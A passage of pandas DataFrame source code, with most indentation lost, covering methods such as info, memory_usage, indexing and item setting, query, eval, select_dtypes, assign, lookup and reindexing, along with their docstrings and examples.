formatter = fmt.DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify, justify=justify,
index_names=index_names,
header=header, index=index,
bold_rows=bold_rows, escape=escape,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal)
        # TODO: a generic formatter would be in DataFrameFormatter
formatter.to_html(classes=classes, notebook=notebook, border=border)
if buf is None:
return formatter.buf.getvalue()
def info(self, verbose=None, buf=None, max_cols=None, memory_usage=None,
null_counts=None):
"""
Concise summary of a DataFrame.
Parameters
----------
verbose : {None, True, False}, optional
Whether to print the full summary.
None follows the `display.max_info_columns` setting.
True or False overrides the `display.max_info_columns` setting.
buf : writable buffer, defaults to sys.stdout
max_cols : int, default None
Determines whether full summary or short summary is printed.
None follows the `display.max_info_columns` setting.
memory_usage : boolean/string, default None
Specifies whether total memory usage of the DataFrame
elements (including index) should be displayed. None follows
the `display.memory_usage` setting. True or False overrides
            the `display.memory_usage` setting. A value of 'deep' is equivalent
            to True with deep introspection. Memory usage is shown in
human-readable units (base-2 representation).
null_counts : boolean, default None
Whether to show the non-null counts
- If None, then only show if the frame is smaller than
max_info_rows and max_info_columns.
- If True, always show counts.
- If False, never show counts.
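        Examples
        --------
        An illustrative sketch; the exact layout and memory figure depend
        on the platform and display options:
        >>> df = pd.DataFrame({'a': [1, 2, 3], 'b': ['x', 'y', None]})
        >>> df.info()  # doctest: +SKIP
        <class 'pandas.core.frame.DataFrame'>
        RangeIndex: 3 entries, 0 to 2
        Data columns (total 2 columns):
        a    3 non-null int64
        b    2 non-null object
        dtypes: int64(1), object(1)
        memory usage: 128.0+ bytes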
"""
from pandas.io.formats.format import _put_lines
if buf is None: # pragma: no cover
buf = sys.stdout
lines = []
lines.append(str(type(self)))
lines.append(self.index.summary())
if len(self.columns) == 0:
lines.append('Empty %s' % type(self).__name__)
_put_lines(buf, lines)
return
cols = self.columns
# hack
if max_cols is None:
max_cols = get_option('display.max_info_columns',
len(self.columns) + 1)
max_rows = get_option('display.max_info_rows', len(self) + 1)
if null_counts is None:
show_counts = ((len(self.columns) <= max_cols) and
(len(self) < max_rows))
else:
show_counts = null_counts
exceeds_info_cols = len(self.columns) > max_cols
def _verbose_repr():
lines.append('Data columns (total %d columns):' %
len(self.columns))
space = max(len(pprint_thing(k)) for k in self.columns) + 4
counts = None
tmpl = "%s%s"
if show_counts:
counts = self.count()
if len(cols) != len(counts): # pragma: no cover
raise AssertionError('Columns must equal counts (%d != %d)'
% (len(cols), len(counts)))
tmpl = "%s non-null %s"
dtypes = self.dtypes
for i, col in enumerate(self.columns):
dtype = dtypes.iloc[i]
col = pprint_thing(col)
count = ""
if show_counts:
count = counts.iloc[i]
lines.append(_put_str(col, space) + tmpl % (count, dtype))
def _non_verbose_repr():
lines.append(self.columns.summary(name='Columns'))
def _sizeof_fmt(num, size_qualifier):
# returns size in human readable format
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f%s %s" % (num, size_qualifier, x)
num /= 1024.0
return "%3.1f%s %s" % (num, size_qualifier, 'PB')
if verbose:
_verbose_repr()
        elif verbose is False:  # verbose explicitly set to False (as opposed to the default None)
_non_verbose_repr()
else:
if exceeds_info_cols:
_non_verbose_repr()
else:
_verbose_repr()
counts = self.get_dtype_counts()
dtypes = ['%s(%d)' % k for k in sorted(compat.iteritems(counts))]
lines.append('dtypes: %s' % ', '.join(dtypes))
if memory_usage is None:
memory_usage = get_option('display.memory_usage')
if memory_usage:
# append memory usage of df to display
size_qualifier = ''
if memory_usage == 'deep':
deep = True
else:
# size_qualifier is just a best effort; not guaranteed to catch
# all cases (e.g., it misses categorical data even with object
# categories)
deep = False
if ('object' in counts or
self.index._is_memory_usage_qualified()):
size_qualifier = '+'
mem_usage = self.memory_usage(index=True, deep=deep).sum()
lines.append("memory usage: %s\n" %
_sizeof_fmt(mem_usage, size_qualifier))
_put_lines(buf, lines)
def memory_usage(self, index=True, deep=False):
"""Memory usage of DataFrame columns.
Parameters
----------
index : bool
            Specifies whether to include memory usage of DataFrame's
            index in returned Series. If `index=True` (the default),
            the first entry of the Series is the memory usage of `Index`.
deep : bool
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption
Returns
-------
sizes : Series
A series with column names as index and memory usage of
columns with units of bytes.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False
See Also
--------
numpy.ndarray.nbytes
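        Examples
        --------
        An illustrative sketch; the byte counts are platform-dependent:
        >>> df = pd.DataFrame({'a': [1, 2, 3], 'b': ['x', 'y', 'z']})
        >>> df.memory_usage()  # doctest: +SKIP
        Index    80
        a        24
        b        24
        dtype: int64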
"""
result = Series([c.memory_usage(index=False, deep=deep)
for col, c in self.iteritems()], index=self.columns)
if index:
result = Series(self.index.memory_usage(deep=deep),
index=['Index']).append(result)
return result
def transpose(self, *args, **kwargs):
"""Transpose index and columns"""
nv.validate_transpose(args, dict())
return super(DataFrame, self).transpose(1, 0, **kwargs)
T = property(transpose)
# ----------------------------------------------------------------------
# Picklability
# legacy pickle formats
def _unpickle_frame_compat(self, state): # pragma: no cover
from pandas.core.common import _unpickle_array
if len(state) == 2: # pragma: no cover
series, idx = state
columns = sorted(series)
else:
series, cols, idx = state
columns = _unpickle_array(cols)
index = _unpickle_array(idx)
self._data = self._init_dict(series, index, columns, None)
def _unpickle_matrix_compat(self, state): # pragma: no cover
from pandas.core.common import _unpickle_array
# old unpickling
(vals, idx, cols), object_state = state
index = _unpickle_array(idx)
dm = DataFrame(vals, index=index, columns=_unpickle_array(cols),
copy=False)
if object_state is not None:
ovals, _, ocols = object_state
objects = DataFrame(ovals, index=index,
columns=_unpickle_array(ocols), copy=False)
dm = dm.join(objects)
self._data = dm._data
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable:
series = self._iget_item_cache(col)
return _maybe_box_datetimelike(series._values[index])
series = self._get_item_cache(col)
engine = self.index._engine
try:
return engine.get_value(series._values, index)
except (TypeError, ValueError):
# we cannot handle direct indexing
# use positional
col = self.columns.get_loc(col)
index = self.index.get_loc(index)
return self._get_value(index, col, takeable=True)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Returns
-------
frame : DataFrame
If label pair is contained, will be reference to calling DataFrame,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
try:
if takeable is True:
series = self._iget_item_cache(col)
return series._set_value(index, value, takeable=True)
series = self._get_item_cache(col)
engine = self.index._engine
engine.set_value(series._values, index, value)
return self
except (KeyError, TypeError):
# set using a non-recursive method & reset the cache
self.loc[index, col] = value
self._item_cache.pop(col, None)
return self
_set_value.__doc__ = set_value.__doc__
def _ixs(self, i, axis=0):
"""
i : int, slice, or sequence of integers
axis : int
"""
# irow
if axis == 0:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
if isinstance(i, slice):
return self[i]
else:
label = self.index[i]
if isinstance(label, Index):
# a location index by definition
result = self.take(i, axis=axis)
copy = True
else:
new_values = self._data.fast_xs(i)
if is_scalar(new_values):
return new_values
# if we are a copy, mark as such
copy = (isinstance(new_values, np.ndarray) and
new_values.base is None)
result = self._constructor_sliced(new_values,
index=self.columns,
name=self.index[i],
dtype=new_values.dtype)
result._set_is_copy(self, copy=copy)
return result
# icol
else:
"""
Notes
-----
If slice passed, the resulting data will be a view
"""
label = self.columns[i]
if isinstance(i, slice):
# need to return view
lab_slice = slice(label[0], label[-1])
return self.loc[:, lab_slice]
else:
if isinstance(label, Index):
return self._take(i, axis=1, convert=True)
index_len = len(self.index)
# if the values returned are not the same length
                # as the index (in other words, a not-found value), iget returns
# a 0-len ndarray. This is effectively catching
# a numpy error (as numpy should really raise)
values = self._data.iget(i)
if index_len and not len(values):
values = np.array([np.nan] * index_len, dtype=object)
result = self._constructor_sliced._from_array(
values, index=self.index, name=label, fastpath=True)
# this is a cached value, mark it so
result._set_as_cached(label, self)
return result
def __getitem__(self, key):
key = com._apply_if_callable(key, self)
# shortcut if we are an actual column
is_mi_columns = isinstance(self.columns, MultiIndex)
try:
if key in self.columns and not is_mi_columns:
return self._getitem_column(key)
except:
pass
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._getitem_slice(indexer)
if isinstance(key, (Series, np.ndarray, Index, list)):
# either boolean or fancy integer index
return self._getitem_array(key)
elif isinstance(key, DataFrame):
return self._getitem_frame(key)
elif is_mi_columns:
return self._getitem_multilevel(key)
else:
return self._getitem_column(key)
def _getitem_column(self, key):
""" return the actual column """
# get column
if self.columns.is_unique:
return self._get_item_cache(key)
# duplicate columns & possible reduce dimensionality
result = self._constructor(self._data.get(key))
if result.columns.is_unique:
result = result[key]
return result
def _getitem_slice(self, key):
return self._slice(key, axis=0)
def _getitem_array(self, key):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
# warning here just in case -- previously __setitem__ was
# reindexing but __getitem__ was not; it seems more reasonable to
# go with the __setitem__ behavior since that is more consistent
# with all other indexing behavior
if isinstance(key, Series) and not key.index.equals(self.index):
warnings.warn("Boolean Series key will be reindexed to match "
"DataFrame index.", UserWarning, stacklevel=3)
elif len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d.' %
(len(key), len(self.index)))
# check_bool_indexer will throw exception if Series key cannot
# be reindexed to match DataFrame rows
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
return self._take(indexer, axis=0, convert=False)
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
return self._take(indexer, axis=1, convert=True)
def _getitem_multilevel(self, key):
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
new_columns = self.columns[loc]
result_columns = maybe_droplevels(new_columns, key)
if self._is_mixed_type:
result = self.reindex(columns=new_columns)
result.columns = result_columns
else:
new_values = self.values[:, loc]
result = self._constructor(new_values, index=self.index,
columns=result_columns)
result = result.__finalize__(self)
# If there is only one column being returned, and its name is
# either an empty string, or a tuple with an empty string as its
# first element, then treat the empty string as a placeholder
# and return the column as if the user had provided that empty
# string in the key. If the result is a Series, exclude the
# implied empty string from its name.
if len(result.columns) == 1:
top = result.columns[0]
if isinstance(top, tuple):
top = top[0]
if top == '':
result = result['']
if isinstance(result, Series):
result = self._constructor_sliced(result,
index=self.index,
name=key)
result._set_is_copy(self)
return result
else:
return self._get_item_cache(key)
def _getitem_frame(self, key):
if key.values.size and not is_bool_dtype(key.values):
raise ValueError('Must pass DataFrame with boolean values only')
return self.where(key)
def query(self, expr, inplace=False, **kwargs):
"""Query the columns of a frame with a boolean expression.
Parameters
----------
expr : string
The query string to evaluate. You can refer to variables
in the environment by prefixing them with an '@' character like
``@a + b``.
inplace : bool
Whether the query should modify the data in place or return
a modified copy
.. versionadded:: 0.18.0
kwargs : dict
See the documentation for :func:`pandas.eval` for complete details
on the keyword arguments accepted by :meth:`DataFrame.query`.
Returns
-------
q : DataFrame
Notes
-----
The result of the evaluation of this expression is first passed to
:attr:`DataFrame.loc` and if that fails because of a
multidimensional key (e.g., a DataFrame) then the result will be passed
to :meth:`DataFrame.__getitem__`.
This method uses the top-level :func:`pandas.eval` function to
evaluate the passed query.
The :meth:`~pandas.DataFrame.query` method uses a slightly
modified Python syntax by default. For example, the ``&`` and ``|``
(bitwise) operators have the precedence of their boolean cousins,
:keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
however the semantics are different.
You can change the semantics of the expression by passing the keyword
argument ``parser='python'``. This enforces the same semantics as
evaluation in Python space. Likewise, you can pass ``engine='python'``
to evaluate an expression using Python itself as a backend. This is not
recommended as it is inefficient compared to using ``numexpr`` as the
engine.
The :attr:`DataFrame.index` and
:attr:`DataFrame.columns` attributes of the
:class:`~pandas.DataFrame` instance are placed in the query namespace
by default, which allows you to treat both the index and columns of the
frame as a column in the frame.
The identifier ``index`` is used for the frame index; you can also
use the name of the index to identify it in a query. Please note that
Python keywords may not be used as identifiers.
For further details and examples see the ``query`` documentation in
:ref:`indexing <indexing.query>`.
See Also
--------
pandas.eval
DataFrame.eval
Examples
--------
>>> from numpy.random import randn
>>> from pandas import DataFrame
>>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
>>> df.query('a > b')
>>> df[df.a > df.b] # same result as the previous expression
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(expr, compat.string_types):
msg = "expr must be a string to be evaluated, {0} given"
raise ValueError(msg.format(type(expr)))
kwargs['level'] = kwargs.pop('level', 0) + 1
kwargs['target'] = None
res = self.eval(expr, **kwargs)
try:
new_data = self.loc[res]
except ValueError:
# when res is multi-dimensional loc raises, but this is sometimes a
# valid query
new_data = self[res]
if inplace:
self._update_inplace(new_data)
else:
return new_data
def eval(self, expr, inplace=False, **kwargs):
"""Evaluate an expression in the context of the calling DataFrame
instance.
Parameters
----------
expr : string
The expression string to evaluate.
inplace : bool, default False
If the expression contains an assignment, whether to perform the
operation inplace and mutate the existing DataFrame. Otherwise,
a new DataFrame is returned.
.. versionadded:: 0.18.0
kwargs : dict
See the documentation for :func:`~pandas.eval` for complete details
on the keyword arguments accepted by
:meth:`~pandas.DataFrame.query`.
Returns
-------
ret : ndarray, scalar, or pandas object
See Also
--------
pandas.DataFrame.query
pandas.DataFrame.assign
pandas.eval
Notes
-----
For more details see the API documentation for :func:`~pandas.eval`.
For detailed examples see :ref:`enhancing performance with eval
<enhancingperf.eval>`.
Examples
--------
>>> from numpy.random import randn
>>> from pandas import DataFrame
>>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
>>> df.eval('a + b')
>>> df.eval('c = a + b')
"""
from pandas.core.computation.eval import eval as _eval
inplace = validate_bool_kwarg(inplace, 'inplace')
resolvers = kwargs.pop('resolvers', None)
kwargs['level'] = kwargs.pop('level', 0) + 1
if resolvers is None:
index_resolvers = self._get_index_resolvers()
resolvers = dict(self.iteritems()), index_resolvers
if 'target' not in kwargs:
kwargs['target'] = self
kwargs['resolvers'] = kwargs.get('resolvers', ()) + tuple(resolvers)
return _eval(expr, inplace=inplace, **kwargs)
def select_dtypes(self, include=None, exclude=None):
"""Return a subset of a DataFrame including/excluding columns based on
their ``dtype``.
Parameters
----------
include, exclude : scalar or list-like
A selection of dtypes or strings to be included/excluded. At least
one of these parameters must be supplied.
Raises
------
ValueError
* If both of ``include`` and ``exclude`` are empty
* If ``include`` and ``exclude`` have overlapping elements
* If any kind of string dtype is passed in.
Returns
-------
subset : DataFrame
The subset of the frame including the dtypes in ``include`` and
excluding the dtypes in ``exclude``.
Notes
-----
* To select all *numeric* types use the numpy dtype ``numpy.number``
* To select strings you must use the ``object`` dtype, but note that
this will return *all* object dtype columns
* See the `numpy dtype hierarchy
<http://docs.scipy.org/doc/numpy/reference/arrays.scalars.html>`__
* To select datetimes, use np.datetime64, 'datetime' or 'datetime64'
* To select timedeltas, use np.timedelta64, 'timedelta' or
'timedelta64'
* To select Pandas categorical dtypes, use 'category'
* To select Pandas datetimetz dtypes, use 'datetimetz' (new in 0.20.0),
or a 'datetime64[ns, tz]' string
Examples
--------
>>> df = pd.DataFrame({'a': np.random.randn(6).astype('f4'),
... 'b': [True, False] * 3,
... 'c': [1.0, 2.0] * 3})
>>> df
a b c
0 0.3962 True 1
1 0.1459 False 2
2 0.2623 True 1
3 0.0764 False 2
4 -0.9703 True 1
5 -1.2094 False 2
>>> df.select_dtypes(include='bool')
               b
0 True
1 False
2 True
3 False
4 True
5 False
        >>> df.select_dtypes(include=['float64'])
             c
        0  1.0
        1  2.0
        2  1.0
        3  2.0
        4  1.0
        5  2.0
>>> df.select_dtypes(exclude=['floating'])
b
0 True
1 False
2 True
3 False
4 True
5 False
"""
if not is_list_like(include):
include = (include,) if include is not None else ()
if not is_list_like(exclude):
exclude = (exclude,) if exclude is not None else ()
selection = tuple(map(frozenset, (include, exclude)))
if not any(selection):
raise ValueError('at least one of include or exclude must be '
'nonempty')
# convert the myriad valid dtypes object to a single representation
include, exclude = map(
lambda x: frozenset(map(_get_dtype_from_object, x)), selection)
for dtypes in (include, exclude):
invalidate_string_dtypes(dtypes)
# can't both include AND exclude!
if not include.isdisjoint(exclude):
raise ValueError('include and exclude overlap on %s' %
(include & exclude))
# empty include/exclude -> defaults to True
# three cases (we've already raised if both are empty)
# case 1: empty include, nonempty exclude
# we have True, True, ... True for include, same for exclude
# in the loop below we get the excluded
# and when we call '&' below we get only the excluded
# case 2: nonempty include, empty exclude
# same as case 1, but with include
# case 3: both nonempty
# the "union" of the logic of case 1 and case 2:
# we get the included and excluded, and return their logical and
include_these = Series(not bool(include), index=self.columns)
exclude_these = Series(not bool(exclude), index=self.columns)
def is_dtype_instance_mapper(column, dtype):
return column, functools.partial(issubclass, dtype.type)
for column, f in itertools.starmap(is_dtype_instance_mapper,
self.dtypes.iteritems()):
if include: # checks for the case of empty include or exclude
include_these[column] = any(map(f, include))
if exclude:
exclude_these[column] = not any(map(f, exclude))
dtype_indexer = include_these & exclude_these
return self.loc[com._get_info_slice(self, dtype_indexer)]
def _box_item_values(self, key, values):
items = self.columns[self.columns.get_loc(key)]
if values.ndim == 2:
return self._constructor(values.T, columns=items, index=self.index)
else:
return self._box_col_values(values, items)
def _box_col_values(self, values, items):
""" provide boxed values for a column """
return self._constructor_sliced._from_array(values, index=self.index,
name=items, fastpath=True)
def __setitem__(self, key, value):
key = com._apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, 'ndim', None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key, value):
self._check_setitem_copy()
self.loc._setitem_with_indexer(key, value)
def _setitem_array(self, key, value):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
if len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d!' %
(len(key), len(self.index)))
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
self._check_setitem_copy()
self.loc._setitem_with_indexer(indexer, value)
else:
if isinstance(value, DataFrame):
if len(value.columns) != len(key):
raise ValueError('Columns must be same length as key')
for k1, k2 in zip(key, value.columns):
self[k1] = value[k2]
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
self._check_setitem_copy()
self.loc._setitem_with_indexer((slice(None), indexer), value)
def _setitem_frame(self, key, value):
# support boolean setting with DataFrame input, e.g.
# df[df > df2] = 0
if isinstance(key, np.ndarray):
if key.shape != self.shape:
raise ValueError(
'Array conditional must be same shape as self'
)
key = self._constructor(key, **self._construct_axes_dict())
if key.values.size and not is_bool_dtype(key.values):
raise TypeError(
'Must pass DataFrame or 2-d ndarray with boolean values only'
)
self._check_inplace_setting(value)
self._check_setitem_copy()
self._where(-key, value, inplace=True)
def _ensure_valid_index(self, value):
"""
ensure that if we don't have an index, that we can create one from the
passed value
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value):
try:
value = Series(value)
except:
raise ValueError('Cannot set a frame with no defined index '
'and a value that cannot be converted to a '
'Series')
self._data = self._data.reindex_axis(value.index.copy(), axis=1,
fill_value=np.nan)
def _set_item(self, key, value):
"""
Add series to DataFrame in specified column.
If series is a numpy-array (not a Series/TimeSeries), it must be the
same length as the DataFrames index or an error will be thrown.
Series/TimeSeries will be conformed to the DataFrames index to
ensure homogeneity.
"""
self._ensure_valid_index(value)
value = self._sanitize_column(key, value)
NDFrame._set_item(self, key, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def insert(self, loc, column, value, allow_duplicates=False):
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
            Insertion index. Must satisfy 0 <= loc <= len(columns)
column : string, number, or hashable object
label of the inserted column
value : int, Series, or array-like
allow_duplicates : bool, optional
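        Examples
        --------
        A minimal sketch:
        >>> df = pd.DataFrame({'a': [1, 2], 'c': [5, 6]})
        >>> df.insert(1, 'b', [3, 4])
        >>> df
           a  b  c
        0  1  3  5
        1  2  4  6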
"""
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._data.insert(loc, column, value,
allow_duplicates=allow_duplicates)
def assign(self, **kwargs):
r"""
Assign new columns to a DataFrame, returning a new object
(a copy) with all the original columns in addition to the new ones.
Parameters
----------
kwargs : keyword, value pairs
keywords are the column names. If the values are
callable, they are computed on the DataFrame and
assigned to the new columns. The callable must not
change input DataFrame (though pandas doesn't check it).
If the values are not callable, (e.g. a Series, scalar, or array),
they are simply assigned.
Returns
-------
df : DataFrame
A new DataFrame with the new columns in addition to
all the existing columns.
Notes
-----
For python 3.6 and above, the columns are inserted in the order of
\*\*kwargs. For python 3.5 and earlier, since \*\*kwargs is unordered,
the columns are inserted in alphabetical order at the end of your
DataFrame. Assigning multiple columns within the same ``assign``
is possible, but you cannot reference other columns created within
the same ``assign`` call.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 11), 'B': np.random.randn(10)})
Where the value is a callable, evaluated on `df`:
>>> df.assign(ln_A = lambda x: np.log(x.A))
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
Where the value already exists and is inserted:
>>> newcol = np.log(df['A'])
>>> df.assign(ln_A=newcol)
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
"""
data = self.copy()
# do all calculations first...
results = OrderedDict()
for k, v in kwargs.items():
results[k] = com._apply_if_callable(v, data)
# preserve order for 3.6 and later, but sort by key for 3.5 and earlier
if PY36:
results = results.items()
else:
results = sorted(results.items())
# ... and then assign
for k, v in results:
data[k] = v
return data
def _sanitize_column(self, key, value, broadcast=True):
"""
Ensures new columns (which go into the BlockManager as new blocks) are
always copied and converted into an array.
Parameters
----------
key : object
value : scalar, Series, or array-like
broadcast : bool, default True
If ``key`` matches multiple duplicate column names in the
DataFrame, this parameter indicates whether ``value`` should be
tiled so that the returned array contains a (duplicated) column for
each occurrence of the key. If False, ``value`` will not be tiled.
Returns
-------
sanitized_column : numpy-array
"""
def reindexer(value):
# reindex if necessary
if value.index.equals(self.index) or not len(self.index):
value = value._values.copy()
else:
# GH 4107
try:
value = value.reindex(self.index)._values
except Exception as e:
# duplicate axis
if not value.index.is_unique:
raise e
# other
raise TypeError('incompatible index of inserted column '
'with frame index')
return value
if isinstance(value, Series):
value = reindexer(value)
elif isinstance(value, DataFrame):
# align right-hand-side columns if self.columns
# is multi-index and self[key] is a sub-frame
if isinstance(self.columns, MultiIndex) and key in self.columns:
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
cols = maybe_droplevels(self.columns[loc], key)
if len(cols) and not cols.equals(value.columns):
value = value.reindex(cols, axis=1)
# now align rows
value = reindexer(value).T
elif isinstance(value, Categorical):
value = value.copy()
elif isinstance(value, Index) or is_sequence(value):
from pandas.core.series import _sanitize_index
# turn me into an ndarray
value = _sanitize_index(value, self.index, copy=False)
if not isinstance(value, (np.ndarray, Index)):
if isinstance(value, list) and len(value) > 0:
value = maybe_convert_platform(value)
else:
value = com._asarray_tuplesafe(value)
elif value.ndim == 2:
value = value.copy().T
elif isinstance(value, Index):
value = value.copy(deep=True)
else:
value = value.copy()
# possibly infer to datetimelike
if is_object_dtype(value.dtype):
value = maybe_infer_to_datetimelike(value)
else:
# upcast the scalar
value = cast_scalar_to_array(len(self.index), value)
value = maybe_cast_to_datetime(value, value.dtype)
# return internal types directly
if is_extension_type(value):
return value
# broadcast across multiple columns if necessary
if broadcast and key in self.columns and value.ndim == 1:
if (not self.columns.is_unique or
isinstance(self.columns, MultiIndex)):
existing_piece = self[key]
if isinstance(existing_piece, DataFrame):
value = np.tile(value, (len(existing_piece.columns), 1))
return np.atleast_2d(np.asarray(value))
@property
def _series(self):
result = {}
for idx, item in enumerate(self.columns):
result[item] = Series(self._data.iget(idx), index=self.index,
name=item)
return result
def lookup(self, row_labels, col_labels):
"""Label-based "fancy indexing" function for DataFrame.
Given equal-length arrays of row and column labels, return an
array of the values corresponding to each (row, col) pair.
Parameters
----------
row_labels : sequence
The row labels to use for lookup
col_labels : sequence
The column labels to use for lookup
Notes
-----
Akin to::
result = []
for row, col in zip(row_labels, col_labels):
result.append(df.get_value(row, col))
        Returns
        -------
        values : ndarray
            The found values
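        Examples
        --------
        A minimal sketch:
        >>> df = pd.DataFrame({'A': [1, 2], 'B': [3, 4]}, index=['x', 'y'])
        >>> df.lookup(['x', 'y'], ['A', 'B'])
        array([1, 4])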
"""
n = len(row_labels)
if n != len(col_labels):
raise ValueError('Row labels must have same size as column labels')
thresh = 1000
if not self._is_mixed_type or n > thresh:
values = self.values
ridx = self.index.get_indexer(row_labels)
cidx = self.columns.get_indexer(col_labels)
if (ridx == -1).any():
raise KeyError('One or more row labels was not found')
if (cidx == -1).any():
raise KeyError('One or more column labels was not found')
flat_index = ridx * len(self.columns) + cidx
result = values.flat[flat_index]
else:
result = np.empty(n, dtype='O')
for i, (r, c) in enumerate(zip(row_labels, col_labels)):
result[i] = self._get_value(r, c)
if is_object_dtype(result):
result = lib.maybe_convert_objects(result)
return result
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
frame = self
columns = axes['columns']
if columns is not None:
frame = frame._reindex_columns(columns, method, copy, level,
fill_value, limit, tolerance)
index = axes['index']
if index is not None:
frame = frame._reindex_index(index, method, copy, level,
fill_value, limit, tolerance)
return frame
def _reindex_index(self, new_index, method, copy, level, fill_value=np.nan,
limit=None, tolerance=None):
new_index, indexer = self.index.reindex(new_index, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({0: [new_index, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_columns(self, new_columns, method, copy, level,
fill_value=np.nan, limit=None, tolerance=None):
new_columns, indexer = self.columns.reindex(new_columns, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({1: [new_columns, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_multi(self, axes, copy, fill_value):
""" we are guaranteed non-Nones in the axes! """
new_index, row_indexer = self.index.reindex(axes['index'])
new_columns, col_indexer = self.columns.reindex(axes['columns'])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(self.values, indexer,
fill_value=fill_value)
return self._constructor(new_values, index=new_index,
columns=new_columns)
else:
return self._reindex_with_indexers({0: [new_index, row_indexer],
1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value)
@Appender(_shared_docs['align'] % _shared_doc_kwargs)
def align(self, other, join='outer', axis=None, level=None, copy=True,
fill_value=None, method=None, limit=None, fill_axis=0,
broadcast_axis=None):
return super(DataFrame, self).align(other, join=join, axis=axis,
level=level, copy=copy,
fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis)
@Appender(_shared_docs['reindex'] % _shared_doc_kwargs)
@rewrite_axis_style_signature('labels', [('method', None),
('copy', True),
('level', None),
('fill_value', np.nan),
('limit', None),
('tolerance', None)])
def reindex(self, *args, **kwargs):
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('labels', None)
return super(DataFrame, self).reindex(**kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(DataFrame,
self).reindex_axis(labels=labels, axis=axis,
method=method, level=level, copy=copy,
limit=limit, fill_value=fill_value)
@rewrite_axis_style_signature('mapper', [('copy', True),
('inplace', False),
('level', None)])
def rename(self, *args, **kwargs):
"""Alter axes labels.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
mapper, index, columns : dict-like or function, optional
dict-like or functions transformations to apply to
that axis' values. Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index`` and
``columns``.
axis : int or str, optional
Axis to target with ``mapper``. Can be either the axis name
('index', 'columns') or number (0, 1). The default is 'index'.
copy : boolean, default True
Also copy underlying data
